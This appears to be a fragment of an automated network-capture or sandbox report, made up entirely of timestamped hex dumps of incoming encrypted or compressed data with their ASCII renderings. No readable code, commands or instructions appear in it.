                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2015INData Raw: ec 49 61 db a7 f0 07 04 af 48 89 0b 2e fa 18 0b 72 3c 41 e3 8d 60 18 10 bc 20 ea 36 2f 90 64 c0 00 24 2f 60 43 78 45 77 b7 a2 03 27 25 33 53 91 04 a2 40 a0 68 77 cd ae 37 f8 3e 00 5b 0b 78 c2 ac da ee c9 27 ab 36 42 6c d7 03 ec b5 2e c0 90 0a d5 30 0e 06 f9 c2 e7 f0 17 5f 05 21 ff 4a 94 da c0 26 54 82 f9 a1 66 02 78 a4 c8 f9 1a 3a 27 16 d0 0c 5a 0c c2 58 ec a0 c0 f8 c1 c4 71 17 d1 a3 e7 fa 20 c0 5d 0f 04 d9 69 30 ee 84 68 a9 f0 4a 80 04 2f ec 35 b2 d8 58 44 38 0f 07 84 29 18 21 d2 38 e9 4d ac 3a a1 68 3e 84 5c 82 ea 0a 78 fc 62 fd b0 ac ce fc b8 59 2a 3e a8 e8 8b 30 f2 bc 27 5f 40 f4 e8 82 50 ca 54 bb 41 c0 19 f6 ea 8c dd 60 b4 d0 36 f0 7f 01 08 ec 2e bc 5d e2 7a 2e a8 04 01 d7 ae ed 34 28 23 20 cc 8a 41 2a 7a 01 7c f3 a6 1a f1 7e 21 c4 49 e8 7e 28 8c 60
                                                                                                                                                                                                  Data Ascii: IaH.r<A` 6/d$/`CxEw'%3S@hw7>[x'6Bl.0_!J&Tfx:'ZXq ]i0hJ/5XD8)!8M:h>\xbY*>0'_@PTA`6.]z.4(# A*z|~!I~(`
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2031INData Raw: 91 ec 5f 92 c8 bc 0a 27 5f e8 80 80 65 80 24 31 0a dc cd fb 53 88 87 a0 f4 69 93 f7 35 33 90 fe 99 e4 14 50 ec 20 f4 0b 78 0e ed a0 68 d5 13 47 76 5c 0d 6c 01 f6 6c c5 d2 aa 3d 21 08 9e 09 c2 24 84 91 4b 58 84 15 13 9b a8 0e 81 15 f9 63 02 46 ed 18 80 14 b4 08 49 c1 80 e3 aa 18 09 fb 20 79 9d 0e 25 40 f0 c0 48 3d d2 a4 84 20 c9 ef 78 db 20 16 ea 34 94 6e 68 41 38 ff ee 23 ab 20 0c c6 a3 84 b0 20 be 0e 90 a8 50 c4 bc 57 29 db 01 c4 8c d9 1a a0 e0 d7 a9 e9 fc d3 94 fc c0 5c 0a 77 ea b2 b8 74 d2 12 7b 24 ca e8 28 10 11 72 78 2e be 2a f8 60 8e 95 0d 37 bd 51 dc 0b b6 73 71 fc a5 70 7c 45 3b 78 f0 27 f8 98 04 71 d1 73 ab 95 a5 28 f5 bb e0 84 3e 19 ff e1 e3 88 32 fe 80 0c b7 86 a4 61 00 aa fc c4 8c df 33 49 2e 5b 76 20 00 22 53 11 e0 1e 9d d1 b0 eb fc 48 58 eb
                                                                                                                                                                                                  Data Ascii: _'_e$1Si53P xhGv\ll=!$KXcFI y%@H= x 4nhA8# PW)\wt{$(rx.*`7Qsqp|E;x'qs(>2a3I.[v "SHX
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2047INData Raw: a2 89 4b 12 ab d4 9c c4 19 4d 5b 21 d2 d4 a4 c4 1a 4c 67 21 5c 9f b1 8c 3f 13 73 22 21 88 64 7f 11 aa 48 8b 91 79 22 97 5a 9f 98 cc 1c 89 a3 96 21 5e a6 94 22 25 64 af 21 67 4c bb 11 c1 89 cb 12 c6 24 db 48 b3 91 eb 22 bb 44 fb ce 88 0b a9 81 ca 6b 62 14 1d 26 1b 21 45 5f 2b 4c dc e6 11 27 c8 21 c5 99 3f 11 c0 12 57 2f 71 22 6f 5a 9c d8 44 1e 89 87 91 21 9d 32 93 11 60 d4 9c c4 36 4c 9f 21 7d b5 31 44 43 13 ab 2d 21 8d 4c 94 e9 13 bb 2d 21 83 4c 9c 44 3c c7 cb 21 84 5b 94 11 1f 32 d3 21 61 26 df 11 5a 71 d8 a4 20 89 eb 96 21 62 a6 f4 22 38 65 f7 21 7f ad ac 9e a2 20 03 aa 5a 65 d9 cc fa 26 0f 21 5a 63 d8 2c 37 8b c6 21 44 a1 33 cb 11 7e 5b ac 11 2a 32 4b 21 6c 26 57 11 44 72 63 89 06 12 73 24 e5 48 83 91 93 22 8f 44 a4 9b 89 b5 12 a7 24 ad 48 b3 91 49 22
                                                                                                                                                                                                  Data Ascii: KM[!Lg!\?s"!dHy"Z!^"%d!gL$H"Dkb&!E_+L'!?W/q"oZD!2`6L!}1DC-!L-!LD<![2!a&Zq !b"8e! Ze&!Zc,7!D3~[*2K!l&WDrcs$H"D$HI"
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2063INData Raw: da 7e 95 80 a7 66 19 9d 14 2d b6 bb c2 ea 5d 44 c7 96 5f 69 e6 16 96 6b 53 05 44 73 b6 fa 5d 41 a3 80 35 7d 45 dc e5 cb 0a cf 76 7f f7 ac 07 c5 b2 5b 67 35 e0 ed 26 55 b1 b8 76 2f ee 5d 94 45 09 5c e9 07 3b 02 8f 51 83 52 31 63 14 27 7e cd 04 14 73 8c 31 42 80 89 0d e1 08 b6 c7 b1 1e 69 e0 e4 a6 cb 60 fc 13 cf 74 0c cc 00 0f e6 d6 e3 10 4e 95 46 9c 25 9f 9f 80 34 4b 5d 13 bb c8 b7 a0 05 53 12 49 fe 39 32 85 7e 30 ad a9 9c 70 65 3c 02 39 1c 18 dd f0 a2 e8 11 4a a6 02 b3 ef ac b7 f4 56 74 19 80 dd 0c c7 42 1b a7 30 62 88 79 95 14 ba 79 04 31 f9 1a 60 6f 18 60 fd 72 18 a5 96 f5 60 e1 b0 20 21 10 0f 06 e7 3d 7e 81 a1 b7 d8 f8 00 d5 d6 39 5b c2 82 e5 1d 74 1a 02 40 2b 8c fd 60 33 78 e9 4c 86 35 b2 46 19 16 2c 61 06 83 12 a0 59 5c a3 0b ab ea 16 9c e6 4d f5 e5
                                                                                                                                                                                                  Data Ascii: ~f-]D_ikSDs]A5}Ev[g5&Uv/]E\;QR1c'~s1Bi`tNF%4K]SI92~0pe<9JVtB0byy1`o`r` !=~9[t@+`3xL5F,aY\M
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2079INData Raw: d2 f2 06 d2 8e 2a d3 bc 86 ed 68 81 b5 69 03 7a a2 15 a2 5b 42 25 d6 4d e8 5e 72 81 4e 9d 8e 1b 25 2d 1c 65 e9 2c 5d 15 65 b0 3d 48 95 02 9d 58 a5 fa e5 2c d4 e4 b5 80 4d 66 0f 0c ce cc 10 0b 5e b3 7c 00 a1 21 68 2c 57 e8 6d b0 4f ce f4 1b 17 01 ee 65 5e 3b 12 88 0b 7e e4 d3 4b 76 1d ed 02 3f d6 cd 58 1e 22 83 19 02 04 66 6a 9c 26 93 41 8d 55 53 eb 74 7a bd eb f2 52 f6 27 fb 02 60 68 2b fd 35 0d d5 a2 97 e3 5d 39 57 30 79 48 16 8c 7e 17 66 66 88 b7 cc 08 c0 9b bd 64 0e f8 38 9d 1b 30 9d af 9b 8a 56 b7 00 b9 26 42 dd 70 81 c9 70 79 26 fd 3f b6 0b 09 96 5e 32 01 f1 f0 46 f5 6f 87 18 8c 61 f6 6b f5 9e 20 96 d8 52 6f 29 25 bc d5 98 f8 91 5f 0f 0d af 7e 2f 0e 8a 6e e8 7f c3 be fc 04 dd 14 90 f0 5e b0 09 b4 dc 72 a9 73 9c b7 82 86 f7 94 be 02 57 bf 83 8f 7b 7d
                                                                                                                                                                                                  Data Ascii: *hiz[B%M^rN%-e,]e=HX,Mf^|!h,WmOe^;~Kv?X"fj&AUStzR'`h+5]9W0yH~ffd80V&Bppy&?^2Foak Ro)%_~/n^rsW{}
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2087INData Raw: 99 c4 91 06 76 4e 38 3d a8 74 3d d9 60 02 a6 9a 56 e1 96 77 20 07 5f 88 44 61 25 34 19 48 4c c0 55 00 3d 74 a8 99 82 25 8b 96 71 b2 13 1e c5 f6 8a cd 09 95 27 fa 7f 6e 19 48 9c f6 a8 1c e9 2f 69 77 3e 99 41 25 0d 6a ce 86 96 b2 51 09 7d 67 2b 76 ba 2d 7e 98 cb d4 cd 54 bf e0 09 7c 0e 7e 74 bd 65 2f a7 53 b8 4b c5 71 4b 7d 1e 68 4b 55 ac aa e5 fb da ae 49 50 e4 ec 66 b9 7b 9f 06 5f b3 04 d0 c2 00 74 df de 73 c1 ed 06 03 81 cd ae 3a dd 3f b0 f5 61 53 f9 ff e7 f0 9a 28 32 4c 53 01 d7 44 b8 e9 26 03 a3 6c 00 6a 79 97 d1 e5 63 9e 8f 91 d8 1c 19 e7 89 38 fb 5d 94 d9 a0 b4 e3 b4 c6 1c e6 11 10 44 f9 2b 17 9d 62 07 ae 07 57 c8 df a8 8f f9 10 22 60 47 fb 2b 1c 8d 12 c9 6f f9 b9 4d b8 1d 2b ea f7 1e 58 05 25 4a eb be 7d 37 0a 1e 0a 39 79 fc 3c f9 22 33 52 10 3b e0
                                                                                                                                                                                                  Data Ascii: vN8=t=`Vw _Da%4HLU=t%q'nH/iw>A%jQ}g+v-~T|~te/SKqK}hKUIPf{_ts:?aS(2LSD&ljyc8]D+bW"`G+oM+X%J}79y<"3R;
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2103INData Raw: d9 29 0d 3f e6 7d 4e e4 72 5d 13 22 9d 1f e8 20 b0 68 7b 69 5e e6 a5 bb 7e 8e f7 22 9d ea de 4c 26 c1 4a a0 62 f0 86 40 a7 dc 70 59 80 a3 ca 01 f0 b9 24 95 fb 98 aa 03 48 bf e0 cb 02 73 f9 bd dc f8 9f 4a 00 28 ba 44 72 1b e5 1c 64 50 02 25 7e d8 e6 44 18 95 c5 28 16 aa 8a 34 10 e5 22 63 92 a2 bf 04 38 43 37 89 cd a4 ff c2 00 2b b2 87 eb f3 8b e9 7c 18 aa 42 e0 1c ab 92 02 ea 32 fd c8 68 78 84 3c 10 fc 24 7e 18 e6 34 57 19 d7 51 b7 70 41 13 0d a7 e2 0c 1e 94 1c 2c 12 01 70 31 80 96 d9 4b fc bd d3 5c e2 dc d0 64 ab 10 9c e2 1c 27 ed f3 03 2d 71 90 5a 56 fe 59 50 6e a6 e7 95 d1 c1 f4 2a f6 3c 6a 8a 31 c6 e9 55 11 4c 51 27 05 bf 88 ae 6e ed d1 d2 f8 4f b4 af a9 50 b9 78 e5 5b bb 2a ff 21 1c 24 5f 37 25 09 5f 67 f2 4b 76 16 76 84 d1 6b 55 3d 5f 4d cc 89 e9 13
                                                                                                                                                                                                  Data Ascii: )?}Nr]" h{i^~"L&Jb@pY$HsJ(DrdP%~D(4"c8C7+|B2hx<$~4WQpA,p1K\d'-qZVYPn*<j1ULQ'nOPx[*!$_7%_gKvvkU=_M
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2119INData Raw: 0a 5e b8 14 5c e5 8d 0b ed 0e 54 48 68 88 d0 02 ae 2b bd 76 02 32 75 dc 9c c4 0f 0a 5b f0 89 83 7d 50 43 38 c0 1b 5f e3 80 13 59 b0 e8 23 c4 f7 2e d6 2c fc f0 a4 5b 5f c8 68 8f 5e 5a f2 94 31 9c 1d dc 95 42 5c da 4b cc 0b 0c 40 fa 01 7f 94 d8 38 32 d2 44 0a 8a 40 1c 0c 7d 0f d8 58 84 e6 09 81 54 85 ac 00 84 c9 52 09 b1 c6 2f e6 f6 d2 e7 d2 88 83 27 55 1c a1 b3 38 04 60 5a 32 12 fb e3 1a a4 b2 53 4f 28 ea 9e 2d ea 1e 57 0b 3d d6 88 54 d3 12 cb 38 d7 8a 94 5a ec 43 bd 3a fd 4a b6 d6 9d 5e d7 d3 02 18 31 82 b1 76 01 d8 2e 81 08 5b 3a fc 52 f0 50 b8 7b 07 ca b7 6f 40 48 10 f7 d8 35 b3 00 c2 9d 7f 05 cf 08 2a 10 be 66 25 7e 29 d8 4c 0a 98 f0 ea a9 bf 91 48 1c 6e b9 29 a4 e3 76 d7 e8 5d e8 56 a8 eb 51 5f 09 88 36 89 1c fd 45 d3 c2 e9 54 dd 6d 04 11 3c c8 83 02
                                                                                                                                                                                                  Data Ascii: ^\THh+v2u[}PC8_Y#.,[_h^Z1B\K@82D@}XTR/'U8`Z2SO(-W=T8ZC:J^1v.[:RP{o@H5*f%~)LHn)v]VQ_6ETm<
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2135INData Raw: d6 95 d5 9c 16 4e 53 e6 24 00 50 b8 43 9c 14 7f 0d 00 c6 c2 77 7d 05 22 fc f1 02 6e 35 ed da 69 ee d4 de 25 77 96 e8 45 9f d4 bc 46 b3 ea 42 9c 98 ef 76 17 39 e6 86 93 f1 35 c2 fc a4 f8 a9 be 25 55 dc 47 74 3e 2f f9 f3 10 73 ea dd b4 5e 20 0e f2 98 20 08 dd b0 66 4e 05 4a e6 5d fb 21 70 bc c6 02 18 de 16 13 68 b0 48 f2 b2 34 5d e6 06 06 70 a5 f0 f5 34 20 b0 d0 b5 f2 be 5e 4a 20 5a a2 fb fe 4a ff ab 9f 74 2f 9d 79 0d 08 fc 25 0e d1 e0 e6 ca 3f 84 f8 b6 5c e6 6a 80 95 15 ee fe 71 12 7b 31 04 a0 e7 48 01 d7 49 39 25 61 b6 e9 b8 b4 7a e1 c2 04 8c ff 81 2a e3 b0 6e a8 6a 0b 48 e7 29 64 74 2f 7c a4 22 12 ca d6 00 73 a1 dc 6b 00 c3 78 69 89 77 3a 0c c0 4a f4 fb 90 ec dc 88 c4 04 72 07 e7 26 9f a9 fe 1c 02 3a be 18 f5 5a 54 fc ea de ac 4f a5 da 77 43 12 8b b3 e7
                                                                                                                                                                                                  Data Ascii: NS$PCw}"n5i%wEFBv95%UGt>/s^ fNJ]!phH4]p4 ^J ZJt/y%?\jq{1HI9%az*njH)dt/|"skxiw:Jr&:ZTOwC
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2151INData Raw: 22 1a 01 d3 0c be ca 94 14 4e 5b f0 89 2c e0 e4 e5 5a 00 3c e4 71 f0 56 f2 ed a3 30 f4 a8 72 04 9f bb 27 e5 29 e0 a2 89 08 13 3d 7d ee aa 48 4b ed 0d 0a 19 30 3d 28 f4 aa c5 69 a9 9a a0 76 1d 01 86 00 12 ed d2 2b 35 2e e7 6f 90 bc 47 14 65 10 34 45 90 83 7c a3 78 11 3e 57 96 b3 28 3d 37 84 d7 3e cd be 16 09 22 60 70 1a 04 26 40 92 c9 34 ef f4 46 d8 48 79 44 13 0b a5 a4 3a 1b 00 96 50 91 4b eb ef 34 5d 19 e9 42 6a 8e 51 d8 24 a5 d3 0c ae de 94 2d 3a c0 5e 10 54 92 10 3b 97 5a 01 c4 07 69 33 08 76 75 c4 f0 48 e2 00 86 1e 49 d0 5e e9 71 7a b5 c8 c0 10 94 c1 28 68 af 4b 0e 32 1c 10 06 32 08 99 02 42 62 1c 1f 55 65 91 64 7e af 13 36 f3 7e c2 50 4a 01 19 98 ad de 40 c8 15 a1 02 b6 5e e1 58 bd 35 5c 5a 80 14 88 c4 71 0f a7 03 66 1f fa 0b 1e 15 00 39 d5 24 27 26
                                                                                                                                                                                                  Data Ascii: "N[,Z<qV0r')=}HK0=(iv+5.oGe4E|x>W(=7>"`p&@4FHyD:PK4]BjQ$-:^T;Zi3vuHI^qz(hK22BbUed~6~PJ@^X5\Zqf9$'&
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2167INData Raw: 0c c8 b6 17 38 89 95 5b 10 b0 00 09 1f e5 74 c2 3e c0 1a 88 03 a7 9d 5f 10 dc b5 14 55 01 86 f9 37 00 b9 bb 5e 4b ec 61 51 80 ae 82 76 0f 85 cf 39 f8 d0 27 96 ea f4 5a 78 2c 02 9e 52 de 29 b8 2e 1e 53 24 b8 82 10 ad de 38 96 04 ae 06 be 66 a1 44 4f 87 38 a2 9b 4f 5a e6 44 f2 4c 78 7e 9f 67 44 88 77 b4 16 3e f8 70 89 d2 e1 06 8e 7f e2 b4 2d 24 d0 64 97 4c 9f 25 f7 94 14 29 27 f2 6a e8 00 22 1a 44 01 63 40 93 ca 75 35 1f 0a ee c7 27 fc fa 51 1b 0c 96 4c 0d b1 84 b6 0e e8 3a d6 81 78 45 94 87 19 29 53 e2 03 8e 63 18 34 07 7d 7c d1 45 0b 16 03 96 d3 90 7c 5b e5 02 09 cd 8a ee 1e 18 48 a2 2b f9 01 d7 1b 36 b6 76 e9 49 2e a7 e4 25 55 71 c9 d2 f7 f3 5a e9 fd 67 65 e4 b7 bf f2 b8 98 1e 55 bd 0b b4 7a 1a 26 7d 6c 62 2c 58 e9 4f b8 4b be 9b a1 92 ad 41 96 41 42 07
                                                                                                                                                                                                  Data Ascii: 8[t>_U7^KaQv9'Zx,R).S$8fDO8OZDLx~gDw>p-$dL%)'j"Dc@u5'QL:xE)Sc4}|E|[H+6vI.%UqZgeUz&}lb,XOKAAB
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2183INData Raw: 89 1c 8f 3d 92 fe e2 92 b4 ea 2f 15 2f 44 6a b7 34 e4 b5 be a5 9f 20 99 95 72 58 6c b9 56 c4 53 8a a8 81 7b a2 12 2f 21 5d 2a fa 7d 01 c6 fa 5c 38 8c 72 5a 27 80 1b 80 2f 1c d6 bb 39 8c b7 f4 54 5b e8 68 71 62 35 44 36 7d ba d7 e8 c1 db ba 34 c1 5d 6e fc a5 94 b0 09 c1 d0 0d de 21 82 35 61 a3 40 f7 14 22 ed 3f f8 c0 a8 cc 04 0b a7 6c 29 c3 80 78 bd 03 fb 3f 79 49 bd e1 3d 93 30 36 0c 4a 70 7d bf 50 6c c5 36 6e 5c f8 81 16 58 87 aa 69 b8 3f f6 62 a5 ef cb c6 4f fd ad f8 5b bd d1 ba d2 f7 51 e0 e7 0c fb 76 ab 56 27 34 44 54 f4 04 bc 4d d2 05 a8 3e ad f4 40 0a 84 95 82 ed d8 59 00 4a 95 b7 e1 01 97 c4 0b e5 40 f3 fe 3b 29 91 6c 9e b0 9c 11 ff 8d 97 b4 9a bc 15 86 5d 1e a2 89 36 4a 74 16 44 da f8 c2 ec ca ff ff e5 dc 48 1e 50 d0 5a 8f 08 20 39 d1 b8 1f 41 5a
                                                                                                                                                                                                  Data Ascii: =//Dj4 rXlVS{/!]*}\8rZ'/9T[hqb5D6}4]n!5a@"?l)x?yI=06Jp}Pl6n\Xi?bO[QvV'4DTM>@YJ@;)l]6JtDHPZ 9AZ
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2199INData Raw: 42 cf 1e 19 ec e3 3b 22 aa d1 57 b3 1a 04 08 c3 87 fd d0 3c b4 28 60 00 0f e0 50 61 78 e3 88 0e 4a db f0 eb f7 10 3a 8b fe 39 a0 5b 21 19 78 5b 01 3a 8d 80 08 ca 85 d4 50 cc b9 58 46 13 4e 0f 09 c8 80 1d 29 fc b6 75 17 c7 9a 54 eb 8a b5 35 8b 90 e2 7d 97 ce 61 11 c7 fd b1 06 1b 1a 12 55 0b bd 91 b1 93 1a 03 e9 99 eb 04 2a ec f6 8f ad 69 9c 6a 1b a0 7f b8 96 68 29 bd 73 f9 c4 53 aa f3 af c7 68 1b 6f 89 38 5f 97 62 a5 d5 1c a9 4e 60 f2 c2 d3 af 2f 3b 60 8d c7 34 a5 7f 9f d9 60 da 20 85 a1 89 1e 5d 9d 67 ec 2f 56 b3 c5 5f bf 2c d7 56 a6 60 bf 3e c2 02 56 68 5c a6 21 7a 5a fc 08 d3 2e da 03 cc ca 5a 4b 50 3d d6 22 91 00 b9 14 b1 ff 5e f7 d9 4c 41 aa 34 17 13 ab c4 3f a2 73 4e 1f 22 65 57 6d 8f 20 7a 97 d0 72 a0 59 0b 71 01 07 c3 f9 62 35 25 aa f9 11 2b ac 44
                                                                                                                                                                                                  Data Ascii: B;"W<(`PaxJ:9[!x[:PXFN)uT5}aU*ijh)sSho8_bN`/;`4` ]g/V_,V`>Vh\!zZ.ZKP="^LA4?sN"eWm zrYqb5%+D
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2215INData Raw: 30 35 24 c1 3c cc 3e 56 f8 a1 4d 0c 60 1d 40 04 76 1b 4e 60 aa 0e 80 bf 47 35 66 25 19 4c a3 97 ce d4 98 63 78 10 59 7f 0c 1f 18 68 c5 3c db 96 07 81 b0 88 d8 0e bb da 15 8c 2f 68 c9 95 6e 6c 79 4e ab 9e 77 16 44 cc 53 f0 31 d8 7a a3 c2 21 31 3d 01 3f d8 9e 03 7a 50 b5 14 b6 11 9b 29 02 12 5f ca 23 fa c2 02 83 81 47 c9 1c 56 63 c2 00 95 42 71 a9 9b c7 f4 81 0b ab 73 68 0a d6 04 00 b9 50 fc 70 75 f9 c2 78 95 0d 02 a3 46 01 9c 25 b4 a7 41 e4 f3 ff dd bf 28 60 54 d4 15 3e 30 59 45 9e ce e9 50 7c 12 29 62 1b 64 fb bf 09 82 c4 2f 9c e0 aa 3e 9a c2 27 76 e9 9b f4 1a 83 46 16 13 bb 1d 30 db e0 27 f9 30 19 dd 11 44 d4 30 f3 12 a4 e9 e3 e5 2d 6f b9 64 e0 68 64 c7 27 9e 48 dc 99 69 5f 15 db 80 5c 50 56 be 59 51 ed de dd 7b 2d 25 df ab bb 57 e1 0d 56 f7 ed ea ce e7
                                                                                                                                                                                                  Data Ascii: 05$<>VM`@vN`G5f%LcxYh</hnlyNwDS1z!1=?zP)_#GVcBqshPpuxF%A(`T>0YEP|)bd/>'vF0'0D0-odhd'Hi_\PVYQ{-%WV
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2231INData Raw: 8b 0c 97 56 7c 8f 97 9e 75 ba b6 17 50 b8 a2 00 8a 7f 2d 4c 92 fd 0e 5e c1 e0 01 66 e8 02 0c 00 07 f7 d8 35 84 aa fe e2 bd 42 64 5f fe 8a da f9 1b 4b 74 a7 58 57 bf 0f 37 99 ff 7f 86 ef 33 0d bd fe 05 5a 56 4d 7a 29 85 5e 8c 74 9f 5c 94 e9 5f 71 4b 49 77 1e f2 bd 90 1b 0d b1 2a a5 0c f3 b5 47 8f 40 e9 0f 12 f5 b7 e2 0e 7f 79 69 6d 9e 2e ea 3b ad 03 51 68 33 76 38 82 59 d4 0e 5b 4b 2f a2 74 81 ae fc 47 35 2f 60 65 49 7b 6d 6a 64 11 15 07 4e 70 ef 99 7f c4 6c d3 5e a6 76 e6 e3 97 fc b7 54 9f 5c 6f d0 56 be 84 80 94 61 78 0b 7b 5f 01 f5 88 ec 08 25 94 9e 9f 16 e9 86 5b 52 57 e7 f1 06 c2 12 56 d7 13 71 5f 58 e8 74 f4 20 44 68 f7 cb 18 7f 11 89 7e 52 ba 1c b9 b7 37 2d 32 96 3e 96 97 20 95 45 1d 0a 20 aa ce 00 dc a1 61 1f 13 8c d2 2a fb a7 3a d2 b7 65 95 f8 4f
                                                                                                                                                                                                  Data Ascii: V|uP-L^f5Bd_KtXW73ZVMz)^t\_qKIw*G@yim.;Qh3v8Y[K/tG5/`eI{mjdNpl^vT\oVax{_%[RWVq_Xt Dh~R7-2> E a*:eO
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2247INData Raw: 20 2e 26 5a cd c5 b6 0f f0 37 13 60 18 3e cf 4b 40 eb a9 22 f9 01 16 21 08 20 e6 ea 22 56 30 bc d0 d0 74 63 84 4a b0 ce c0 11 c0 01 b1 04 42 1a 13 c2 d7 e8 16 ad 93 fc bd 84 3d be ed 96 9c a5 55 0b e6 74 f3 90 07 7b a8 b1 8a e7 0a f9 12 39 fc a4 0e fe fd 09 10 69 6c cd 7c 66 3e 03 c0 43 5d a9 e4 7c 91 a9 24 88 16 3e f0 8e e7 16 1a 46 5b b9 ae 27 24 78 9a 0b 15 e5 fd 06 5d 16 b7 2c 6d 99 d4 42 5e 23 57 c2 42 56 a2 17 ed aa 06 ce c8 4f f4 4a 34 c1 3e d9 38 2a b3 18 02 f8 d0 b3 b4 dd 5e b0 00 e0 e2 b5 53 a0 16 03 b9 9a 9b 17 8b 25 f4 f7 4f 26 aa 4f 03 5a 0e b8 c5 00 b9 97 dc b7 c4 72 09 e7 26 d9 35 b4 41 12 7b 02 f2 57 f8 04 25 15 e3 56 16 60 aa 12 d6 ee d3 30 eb c6 d3 28 2c 48 0a 42 42 1e 0c 03 84 83 09 70 09 40 08 22 52 27 bd 64 34 00 90 1f 0c 18 55 f6 97
                                                                                                                                                                                                  Data Ascii: .&Z7`>K@"! "V0tcJB=Ut{9il|f>C]|$>F['$x],mB^#WBVOJ4>8*^S%O&OZr&5A{W%V`0(,HBBp@"R'd4U
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2263INData Raw: 6c 95 19 8e 4c 82 11 89 85 7e 3d dd e5 3d 1f 45 90 1e 16 8a 4e 92 16 47 df 0b 4b 77 6c 63 4d 04 81 0b 64 0d cc 90 7c f5 6f 02 32 c9 95 ef 33 07 6a 16 80 46 d0 7e 20 f3 25 1b ae 77 67 67 04 11 51 01 32 55 df 64 8f 28 95 56 4a 24 4c b2 7a c0 ca d7 bc 35 00 73 94 18 3e ee f8 08 7d e2 2e b7 da 1c 40 0b 22 b2 c7 01 a6 ec 6d b9 50 d6 19 7a 91 1a 45 93 47 32 85 0f b7 4c 06 b5 21 34 8d 7c 26 81 76 f2 3f ad 8b 25 c2 c5 88 a1 71 25 d1 e3 57 c5 d7 28 32 20 58 dd 0a 04 6c c6 b2 f4 70 41 66 bf 74 b3 dc 25 63 cb 7f 45 e9 c2 51 53 08 a6 24 c1 12 23 44 6c ce 27 21 e6 a8 7a 40 9e 04 8b c4 71 15 34 a5 bc 19 80 1a 46 b8 02 12 73 04 19 cc 90 74 25 63 7c 63 f8 89 4c 80 2f c3 ca ca b0 5c 5a a5 01 8f 7f 9a d4 8b 1f 8d 7b a0 c3 70 b7 63 8c 1e 8a eb 9c 4b e2 de 92 ee 7d 5b 3f c2
                                                                                                                                                                                                  Data Ascii: lL~==ENGKwlcMd|o23jF~ %wggQ2Ud(VJ$Lz5s>}.@"mPzEG2L!4|&v?%q%W(2 XlpAft%cEQS$#Dl'!z@q4Fst%c|cL/\Z{pcK}[?
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2279INData Raw: 0f 01 e4 9e 30 7a 10 d7 e8 87 12 89 a6 ce b6 27 25 6d 9e e5 f7 d5 02 ad d6 f0 5d cf 01 2e ec 81 cf 85 54 0e 23 c1 5f 40 a7 00 10 3e 33 b7 f1 46 8c 68 87 2c 34 1a 4d a7 35 26 c0 8d b5 6b bf ef 32 8c 53 06 3c e7 5a 35 b2 62 cf ef 96 bf 8a 65 4f ff 38 dc c2 46 9d 4e 45 30 4c 62 fe cc e0 6f 41 f0 1e 50 1a d7 56 28 dd 53 3d cb d7 18 e0 a5 99 d6 28 08 ea 8f 63 b7 a1 58 18 ea 4e f8 f8 c4 74 e2 09 a7 54 dc 43 cf 1a 74 50 10 12 95 9a 24 ea 14 12 89 ba 71 86 a9 5e 3a eb 3d 2f 3c b0 4c 3e 18 7a 79 14 b0 58 c2 20 76 a5 72 79 a8 0c ec 64 18 99 4f 0d ae 21 c3 f6 30 21 3c 2e a3 2c 10 9e 70 4e a9 74 f4 22 8c 02 fd db 23 90 cd c9 7e 50 46 04 e6 50 08 ab db c8 ff fb 50 0c d9 31 9d 19 36 27 7f 06 4e 86 b7 18 00 78 47 85 61 a4 5b 2c ea 01 56 64 4d c0 e9 27 76 ba be 9d bc f7
                                                                                                                                                                                                  Data Ascii: 0z'%m].T#_@>3Fh,4M5&k2S<Z5beO8FNE0LboAPV(S=(cXNtTCtP$q^:=/<L>zyX vrydO!0!<.,pNt"#~PFPP16'NxGa[,VdM'v
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2295INData Raw: af 30 fa 5a 21 81 17 b6 8b f1 21 28 59 2a 3f cc 7b 20 60 60 cc 96 38 88 f3 a0 ee 90 f5 a0 72 1f a2 9e 56 18 d3 e0 72 a3 25 e7 f4 d4 f3 8c 53 f3 18 8b c4 61 bf 94 1f a5 b1 46 73 11 f3 7f 00 25 a3 8f 2f 83 b8 89 f2 7f d0 01 62 ba 11 d4 71 da f4 00 32 4b c2 61 09 a5 ca f9 91 88 00 47 bc 3e 07 94 85 4e 6d a3 e2 82 a9 a6 fe 19 4f 3e b8 64 b1 d8 d7 84 0d 03 90 7e bb b6 2c 23 5c 8b 75 e3 7a 06 2f 31 8e 5c d0 58 4d 51 84 25 9b 79 98 42 8d f1 cc 1c d2 10 91 20 ef 10 28 c2 2b 8a e4 26 0c b2 a5 4a ba f0 40 f8 2c f8 f9 f8 30 f8 75 91 5c 88 b0 39 42 50 06 79 2e a7 5d bc be 72 e2 80 46 51 00 b6 88 1f 99 a3 b9 ac 49 95 5f 14 4b 38 d6 04 4e ab dd 97 2b ab 38 c9 75 22 3d fe 00 a2 90 1e 21 b4 44 0c b6 03 be ad 84 aa 27 7e 12 3c 60 fb 47 5c 82 3d e9 c6 ca 49 07 ed 27 4a 89
                                                                                                                                                                                                  Data Ascii: 0Z!!(Y*?{ ``8rVr%SaFs%/bq2KaG>NmO>d~,#\uz/1\XMQ%yB (+&J@,0u\9BPy.]rFQI_K8N+8u"=!D'~<`G\=I'J
